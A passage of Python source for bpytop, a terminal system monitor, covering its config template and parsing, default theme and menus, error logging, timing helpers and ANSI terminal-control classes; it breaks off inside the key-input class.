("#f09800", "#00bfe6", "██╔══██╗██╔══██╗╚██╗ ██╔╝╚══██╔══╝██╔═══██╗██╔══██╗"),
("#db8b00", "#00a6c7", "██████╔╝██████╔╝ ╚████╔╝ ██║ ██║ ██║██████╔╝"),
("#c27b00", "#008ca8", "██╔══██╗██╔═══╝ ╚██╔╝ ██║ ██║ ██║██╔═══╝ "),
("#a86b00", "#006e85", "██████╔╝██║ ██║ ██║ ╚██████╔╝██║"),
("#000000", "#000000", "╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝"),
]
#*?This is the template used to create the config file
DEFAULT_CONF: Template = Template(f'#? Config file for bpytop v. {VERSION}' + '''
#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="$color_theme"
#* If the theme set background should be shown, set to False if you want terminal background transparency
theme_background=$theme_background
#* Sets if 24-bit truecolor should be used, will convert 24-bit colors to 256 color (6x6x6 color cube) if false.
truecolor=$truecolor
#* Manually set which boxes to show. Available values are "cpu mem net proc", seperate values with whitespace.
shown_boxes="$shown_boxes"
#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=$update_ms
#* Processes update multiplier, sets how often the process list is updated as a multiplier of "update_ms".
#* Set to 2 or higher to greatly decrease bpytop cpu usage. (Only integers)
proc_update_mult=$proc_update_mult
#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="$proc_sorting"
#* Reverse sorting order, True or False.
proc_reversed=$proc_reversed
#* Show processes as a tree
proc_tree=$proc_tree
#* Which depth the tree view should auto collapse processes at
tree_depth=$tree_depth
#* Use the cpu graph colors in the process list.
proc_colors=$proc_colors
#* Use a darkening gradient in the process list.
proc_gradient=$proc_gradient
#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=$proc_per_core
#* Show process memory as bytes instead of percent
proc_mem_bytes=$proc_mem_bytes
#* Sets the CPU stat shown in upper half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_upper="$cpu_graph_upper"
#* Sets the CPU stat shown in lower half of the CPU graph, "total" is always available, see:
#* https://psutil.readthedocs.io/en/latest/#psutil.cpu_times for attributes available on specific platforms.
#* Select from a list of detected attributes from the options menu
cpu_graph_lower="$cpu_graph_lower"
#* Toggles if the lower CPU graph should be inverted.
cpu_invert_lower=$cpu_invert_lower
#* Set to True to completely disable the lower CPU graph.
cpu_single_graph=$cpu_single_graph
#* Shows the system uptime in the CPU box.
show_uptime=$show_uptime
#* Check cpu temperature, needs "osx-cpu-temp" on MacOS X.
check_temp=$check_temp
#* Which sensor to use for cpu temperature, use options menu to select from list of available sensors.
cpu_sensor=$cpu_sensor
#* Show temperatures for cpu cores also if check_temp is True and sensors has been found
show_coretemp=$show_coretemp
#* Which temperature scale to use, available values: "celsius", "fahrenheit", "kelvin" and "rankine"
temp_scale="$temp_scale"
#* Show CPU frequency, can cause slowdowns on certain systems with some versions of psutil
show_cpu_freq=$show_cpu_freq
#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="$draw_clock"
#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=$background_update
#* Custom cpu model name, empty string to disable.
custom_cpu_name="$custom_cpu_name"
#* Optional filter for shown disks, should be full path of a mountpoint, separate multiple values with a comma ",".
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=/boot, /home/user"
disks_filter="$disks_filter"
#* Show graphs instead of meters for memory values.
mem_graphs=$mem_graphs
#* If swap memory should be shown in memory box.
show_swap=$show_swap
#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Filter out non physical disks. Set this to False to include network disks, RAM disks and similar.
only_physical=$only_physical
#* Read disks list from /etc/fstab. This also disables only_physical.
use_fstab=$use_fstab
#* Toggles if io stats should be shown in regular disk usage view
show_io_stat=$show_io_stat
#* Toggles io mode for disks, showing only big graphs for disk read/write speeds.
io_mode=$io_mode
#* Set to True to show combined read/write io graphs in io mode.
io_graph_combined=$io_graph_combined
#* Set the top speed for the io graphs in MiB/s (10 by default), use format "device:speed" seperate disks with a comma ",".
#* Example: "/dev/sda:100, /dev/sdb:20"
io_graph_speeds="$io_graph_speeds"
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Starts with the Network Interface specified here.
net_iface="$net_iface"
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
#* Create the user config directory (with a themes subfolder) on first run
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
	try:
		os.makedirs(CONFIG_DIR)
		os.mkdir(f'{CONFIG_DIR}/themes')
	except PermissionError:
		print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
		raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
#* Locate the bundled theme folder: next to this file first, then common system install locations
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
	THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
	for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
		if os.path.isdir(f'{td}share/bpytop/themes'):
			THEME_DIR = f'{td}share/bpytop/themes'
			break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
#* Physical and logical core counts, falling back to 1 if psutil can't determine them
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "#00",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
	errlog = logging.getLogger("ErrorLogger")
	errlog.setLevel(logging.DEBUG)
	#* Rotating log file capped at 1 MiB with up to 4 old logs kept
	eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
	eh.setLevel(logging.DEBUG)
	eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
	errlog.addHandler(eh)
except PermissionError:
	print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
	raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
	"""Named wall-clock timers for testing and debugging.
	start() begins a timer, pause() freezes it, stop() logs the total
	elapsed time (including any paused time) through errlog.debug()."""
	timers: Dict[str, float] = {}
	paused: Dict[str, float] = {}
	@classmethod
	def start(cls, name):
		#* Begin (or restart) the timer called *name*
		cls.timers[name] = time()
	@classmethod
	def pause(cls, name):
		#* Freeze a running timer, keeping its elapsed time for a later stop()
		started = cls.timers.pop(name, None)
		if started is not None:
			cls.paused[name] = time() - started
	@classmethod
	def stop(cls, name):
		#* Stop a running timer and log the total elapsed time; no-op if not running
		started = cls.timers.pop(name, None)
		if started is None:
			return
		total: float = time() - started
		total += cls.paused.pop(name, 0.0)
		errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
	"""Decorator that logs the wall-clock runtime of each call to *func* via errlog.debug().
	Uses functools.wraps so the wrapped function keeps its __name__, __doc__ and
	other metadata, which the original version silently discarded."""
	from functools import wraps #* local import: functools is not imported at module level
	@wraps(func)
	def timed(*args, **kw):
		ts = time()
		out = func(*args, **kw)
		errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
		return out
	return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
	'''Holds all config variables and functions for loading from and saving to disk'''
	#* All keys that are recognized when parsing the config file; anything else is ignored
	keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
						"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
						"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
						"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
						"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
						"cpu_single_graph", "show_uptime", "temp_scale", "show_cpu_freq"]
	#* Mirror of all current values, used as the substitution mapping when saving (see save_config)
	conf_dict: Dict[str, Union[str, int, bool]] = {}
	#* Default values below; overwritten by the config file in __init__ where valid
	color_theme: str = "Default"
	theme_background: bool = True
	truecolor: bool = True
	shown_boxes: str = "cpu mem net proc"
	update_ms: int = 2000
	proc_update_mult: int = 2
	proc_sorting: str = "cpu lazy"
	proc_reversed: bool = False
	proc_tree: bool = False
	tree_depth: int = 3
	proc_colors: bool = True
	proc_gradient: bool = True
	proc_per_core: bool = False
	proc_mem_bytes: bool = True
	cpu_graph_upper: str = "total"
	cpu_graph_lower: str = "total"
	cpu_invert_lower: bool = True
	cpu_single_graph: bool = False
	show_uptime: bool = True
	check_temp: bool = True
	cpu_sensor: str = "Auto"
	show_coretemp: bool = True
	temp_scale: str = "celsius"
	show_cpu_freq: bool = True
	draw_clock: str = "%X"
	background_update: bool = True
	custom_cpu_name: str = ""
	disks_filter: str = ""
	update_check: bool = True
	mem_graphs: bool = True
	show_swap: bool = True
	swap_disk: bool = True
	show_disks: bool = True
	only_physical: bool = True
	use_fstab: bool = False
	show_io_stat: bool = True
	io_mode: bool = False
	io_graph_combined: bool = False
	io_graph_speeds: str = ""
	net_download: str = "10M"
	net_upload: str = "10M"
	net_color_fixed: bool = False
	net_auto: bool = True
	net_sync: bool = False
	net_iface: str = ""
	show_battery: bool = True
	show_init: bool = False
	log_level: str = "WARNING"
	#* Messages collected during parsing, logged after the logger level is set
	warnings: List[str] = []
	info: List[str] = []
	#* Accepted values used by load_config() validation below
	sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
	log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
	#* "total" plus whatever per-platform fields psutil.cpu_times_percent() exposes
	cpu_percent_fields: List = ["total"]
	cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
	temp_scales: List[str] = ["celsius", "fahrenheit", "kelvin", "rankine"]
	#* Detect available temperature sensors at class creation; "Auto" is always present
	cpu_sensors: List[str] = [ "Auto" ]
	if hasattr(psutil, "sensors_temperatures"):
		try:
			_temps = psutil.sensors_temperatures()
			if _temps:
				for _name, _entries in _temps.items():
					for _num, _entry in enumerate(_entries, 1):
						if hasattr(_entry, "current"):
							#* Sensor id is "<chip>:<label>" or "<chip>:<index>" when the label is empty
							cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
		except:
			pass
	changed: bool = False
	recreate: bool = False
	config_file: str = ""
	_initialized: bool = False
	def __init__(self, path: str):
		"""Load config values from *path*, keeping class defaults for missing or invalid keys.
		Sets self.recreate when the file is missing, malformed or from another version."""
		self.config_file = path
		conf: Dict[str, Union[str, int, bool]] = self.load_config()
		if not "version" in conf.keys():
			self.recreate = True
			self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
		elif conf["version"] != VERSION:
			self.recreate = True
			self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
		for key in self.keys:
			if key in conf.keys() and conf[key] != "_error_":
				setattr(self, key, conf[key])
			else:
				#* Key missing or flagged invalid: keep the default and schedule a rewrite
				self.recreate = True
				self.conf_dict[key] = getattr(self, key)
		self._initialized = True
	def __setattr__(self, name, value):
		"""Mirror every attribute change into conf_dict and flag the config as changed once initialized."""
		if self._initialized:
			object.__setattr__(self, "changed", True)
		object.__setattr__(self, name, value)
		if name not in ["_initialized", "recreate", "changed"]:
			self.conf_dict[name] = value
	def load_config(self) -> Dict[str, Union[str, int, bool]]:
		'''Load config from file, set correct types for values and return a dict'''
		new_config: Dict[str,Union[str, int, bool]] = {}
		conf_file: str = ""
		#* Prefer the user config file, then fall back to a system wide config
		if os.path.isfile(self.config_file):
			conf_file = self.config_file
		elif SYSTEM == "BSD" and os.path.isfile("/usr/local/etc/bpytop.conf"):
			conf_file = "/usr/local/etc/bpytop.conf"
		elif SYSTEM != "BSD" and os.path.isfile("/etc/bpytop.conf"):
			conf_file = "/etc/bpytop.conf"
		else:
			return new_config
		try:
			with open(conf_file, "r") as f:
				for line in f:
					line = line.strip()
					if line.startswith("#? Config"):
						#* The header comment carries the config file version after "v. "
						new_config["version"] = line[line.find("v. ") + 3:]
						continue
					if not '=' in line:
						continue
					key, line = line.split('=', maxsplit=1)
					if not key in self.keys:
						continue
					line = line.strip('"')
					#* Coerce the raw string to the type of the matching class attribute
					if type(getattr(self, key)) == int:
						try:
							new_config[key] = int(line)
						except ValueError:
							self.warnings.append(f'Config key "{key}" should be an integer!')
					if type(getattr(self, key)) == bool:
						try:
							new_config[key] = bool(strtobool(line))
						except ValueError:
							self.warnings.append(f'Config key "{key}" can only be True or False!')
					if type(getattr(self, key)) == str:
						new_config[key] = str(line)
		except Exception as e:
			errlog.exception(str(e))
		#* Validation: "_error_" marks a key that __init__ should replace with its default
		if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
			new_config["proc_sorting"] = "_error_"
			self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
		if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
			new_config["log_level"] = "_error_"
			self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
		if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
			new_config["update_ms"] = 100
			self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
		for net_name in ["net_download", "net_upload"]:
			if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
				new_config[net_name] = "_error_"
		if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
			new_config["cpu_sensor"] = "_error_"
			self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
		if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
			for box in new_config["shown_boxes"].split(): #type: ignore
				if not box in ["cpu", "mem", "net", "proc"]:
					new_config["shown_boxes"] = "_error_"
					self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
					break
		for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
			if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
				new_config[cpu_graph] = "_error_"
				self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
		if "temp_scale" in new_config and not new_config["temp_scale"] in self.temp_scales:
			new_config["temp_scale"] = "_error_"
			self.warnings.append(f'Config key "temp_scale" does not contain a recognized temperature scale!')
		return new_config
	def save_config(self):
		'''Save current config to config file if difference in values or version, creates a new file if not found'''
		if not self.changed and not self.recreate: return
		try:
			#* "x" mode creates the file when it doesn't exist yet
			with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
				f.write(DEFAULT_CONF.substitute(self.conf_dict))
		except Exception as e:
			errlog.exception(str(e))
#* Instantiate the config and apply the loaded log level; exit on any unexpected failure
try:
	CONFIG: Config = Config(CONFIG_FILE)
	if DEBUG:
		errlog.setLevel(logging.DEBUG)
	else:
		errlog.setLevel(getattr(logging, CONFIG.log_level))
		DEBUG = CONFIG.log_level == "DEBUG"
	errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
	errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
	errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
	errlog.debug(f'CMD: {" ".join(sys.argv)}')
	#* Flush any messages collected while the config was being parsed
	if CONFIG.info:
		for info in CONFIG.info:
			errlog.info(info)
		CONFIG.info = []
	if CONFIG.warnings:
		for warning in CONFIG.warnings:
			errlog.warning(warning)
		CONFIG.warnings = []
except Exception as e:
	errlog.exception(f'{e}')
	raise SystemExit(1)
#* Apply the -b/--boxes command line override, keeping only valid box names
if ARG_BOXES:
	_new_boxes: List = []
	for _box in ARG_BOXES.split():
		if _box in ["cpu", "mem", "net", "proc"]:
			_new_boxes.append(_box)
	CONFIG.shown_boxes = " ".join(_new_boxes)
	del _box, _new_boxes
#* Hide the battery meter on Linux systems without a power supply entry in sysfs
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
	CONFIG.show_battery = False
#* Warn (but keep running) on psutil versions older than 5.7.0
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
	warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
	print("WARNING!", warn)
	errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
	"""Terminal info and commands"""
	width: int = 0 #* Last accepted terminal width
	height: int = 0 #* Last accepted terminal height
	resized: bool = False #* True while a resize is being handled
	_w : int = 0 #* Latest raw width from os.get_terminal_size()
	_h : int = 0 #* Latest raw height from os.get_terminal_size()
	fg: str = "" #* Default foreground color
	bg: str = "" #* Default background color
	hide_cursor = "\033[?25l" #* Hide terminal cursor
	show_cursor = "\033[?25h" #* Show terminal cursor
	alt_screen = "\033[?1049h" #* Switch to alternate screen
	normal_screen = "\033[?1049l" #* Switch to normal screen
	clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
	mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
	mouse_off = "\033[?1002l" #* Disable mouse reporting
	mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
	mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
	winch = threading.Event() #* Set on terminal resize to wake waiting loops
	old_boxes: List = [] #* Box layout seen on the previous refresh, used to detect layout changes
	min_width: int = 0 #* Minimum terminal width required by the current box layout
	min_height: int = 0 #* Minimum terminal height required by the current box layout
	@classmethod
	def refresh(cls, *args, force: bool = False):
		"""Update width, height and set resized flag if terminal has been resized"""
		if Init.running: cls.resized = False; return
		if cls.resized: cls.winch.set(); return
		cls._w, cls._h = os.get_terminal_size()
		if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
		if force: Collector.collect_interrupt = True
		#* If the set of shown boxes changed, recalculate the minimum size the layout needs
		if cls.old_boxes != Box.boxes:
			w_p = h_p = 0
			cls.min_width = cls.min_height = 0
			cls.old_boxes = Box.boxes.copy()
			for box_class in Box.__subclasses__():
				for box_name in Box.boxes:
					if box_name in str(box_class).capitalize():
						#* Add widths/heights only while the summed percentages stay within 100,
						#* skipping boxes that share a column/row with another shown box
						if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
							w_p += box_class.width_p
							cls.min_width += getattr(box_class, "min_w", 0)
						if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
							h_p += box_class.height_p
							cls.min_height += getattr(box_class, "min_h", 0)
		#* Loop until the reported size is stable and large enough for the layout
		while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
			if Init.running: Init.resized = True
			CpuBox.clock_block = True
			cls.resized = True
			Collector.collect_interrupt = True
			cls.width, cls.height = cls._w, cls._h
			Draw.now(Term.clear)
			box_width = min(50, cls._w - 2)
			Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
				f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
			if cls._w < 80 or cls._h < 24:
				#* Terminal too small: show a warning box until resized big enough or "q" quits
				while cls._w < cls.min_width or cls._h < cls.min_height:
					Draw.now(Term.clear)
					box_width = min(50, cls._w - 2)
					Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
						f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
						f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
						f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config need: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
					cls.winch.wait(0.3)
					while Key.has_key():
						if Key.last() == "q": clean_quit()
					cls.winch.clear()
					cls._w, cls._h = os.get_terminal_size()
			else:
				cls.winch.wait(0.3)
				cls.winch.clear()
			cls._w, cls._h = os.get_terminal_size()
		#* Resize finished: reset clickable areas, recalculate box sizes and redraw background
		Key.mouse = {}
		Box.calc_sizes()
		Collector.proc_counter = 1
		if Menu.active: Menu.resized = True
		Box.draw_bg(now=False)
		cls.resized = False
		Timer.finish()
	@staticmethod
	def echo(on: bool):
		"""Toggle input echo"""
		(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
		if on:
			lflag |= termios.ECHO # type: ignore
		else:
			lflag &= ~termios.ECHO # type: ignore
		new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
		termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
	@staticmethod
	def title(text: str = "") -> str:
		"""Return an escape sequence setting the terminal title to $TERMINAL_TITLE plus *text*"""
		out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
		if out and text: out += " "
		if text: out += f'{text}'
		return f'\033]0;{out}\a'
class Fx:
	"""ANSI SGR text effect codes plus two string helpers:
	* trans(string): replaces every space with a cursor-right escape so the
	  background behind the whitespace is not overwritten when drawn.
	* uncolor(string): strips all 24-bit color escape sequences from the string."""
	start = "\033[" #* Escape sequence start
	sep = ";" #* Escape sequence separator
	end = "m" #* Escape sequence end
	reset = rs = "\033[0m" #* Reset foreground/background color and text effects
	bold = b = "\033[1m" #* Bold on
	unbold = ub = "\033[22m" #* Bold off
	dark = d = "\033[2m" #* Dark on
	undark = ud = "\033[22m" #* Dark off
	italic = i = "\033[3m" #* Italic on
	unitalic = ui = "\033[23m" #* Italic off
	underline = u = "\033[4m" #* Underline on
	ununderline = uu = "\033[24m" #* Underline off
	blink = bl = "\033[5m" #* Blink on
	unblink = ubl = "\033[25m" #* Blink off
	strike = s = "\033[9m" #* Strike / crossed-out on
	unstrike = us = "\033[29m" #* Strike / crossed-out off
	#* Matches one 24-bit color escape sequence, e.g. "\033[38;2;255;0;0m"
	color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
	@staticmethod
	def trans(string: str):
		#* Every space becomes a "move cursor right one column" escape
		return "\033[1C".join(string.split(" "))
	@classmethod
	def uncolor(cls, string: str) -> str:
		return cls.color_re.sub("", string)
class Raw(object):
	"""Context manager that puts *stream*'s terminal into cbreak mode on entry
	and restores the original terminal attributes on exit."""
	def __init__(self, stream):
		self.stream = stream
		self.fd = stream.fileno()
	def __enter__(self):
		#* Remember current settings so __exit__ can restore them
		self.original_stty = termios.tcgetattr(self.stream)
		tty.setcbreak(self.stream)
	def __exit__(self, type, value, traceback):
		termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
	"""Context manager that switches *stream*'s file descriptor into
	non-blocking mode on entry and restores the previous flags on exit."""
	def __init__(self, stream):
		self.stream = stream
		self.fd = stream.fileno()
	def __enter__(self):
		#* Save the current flags, then set O_NONBLOCK on top of them
		self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
		fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
	def __exit__(self, *args):
		#* Restore the saved flags
		fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
	"""Cursor movement helpers returning ANSI escape strings:
	.t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
	@staticmethod
	def to(line: int, col: int) -> str:
		"""Move cursor to absolute position line, col"""
		return "\033[" + str(line) + ";" + str(col) + "f"
	@staticmethod
	def right(x: int) -> str:
		"""Move cursor right x columns"""
		return "\033[" + str(x) + "C"
	@staticmethod
	def left(x: int) -> str:
		"""Move cursor left x columns"""
		return "\033[" + str(x) + "D"
	@staticmethod
	def up(x: int) -> str:
		"""Move cursor up x lines"""
		return "\033[" + str(x) + "A"
	@staticmethod
	def down(x: int) -> str:
		"""Move cursor down x lines"""
		return "\033[" + str(x) + "B"
	save: str = "\033[s" #* Save cursor position
	restore: str = "\033[u" #* Restore saved cursor postion
	#* Single-letter aliases
	t = to
	r = right
	l = left
	u = up
	d = down
class Key:
	"""Handles the threaded input reader for keypresses and mouse events"""
	list: List[str] = [] #* Queue of parsed key names, oldest first, capped at 10 entries
	mouse: Dict[str, List[List[int]]] = {} #* Clickable key name -> list of [col, line] positions
	mouse_pos: Tuple[int, int] = (0, 0) #* Last reported mouse position
	#* Escape sequence (without the leading \033) to readable key name translation
	escape: Dict[Union[str, Tuple[str, str]], str] = {
		"\n" : "enter",
		("\x7f", "\x08") : "backspace",
		("[A", "OA") : "up",
		("[B", "OB") : "down",
		("[D", "OD") : "left",
		("[C", "OC") : "right",
		"[2~" : "insert",
		"[3~" : "delete",
		"[H" : "home",
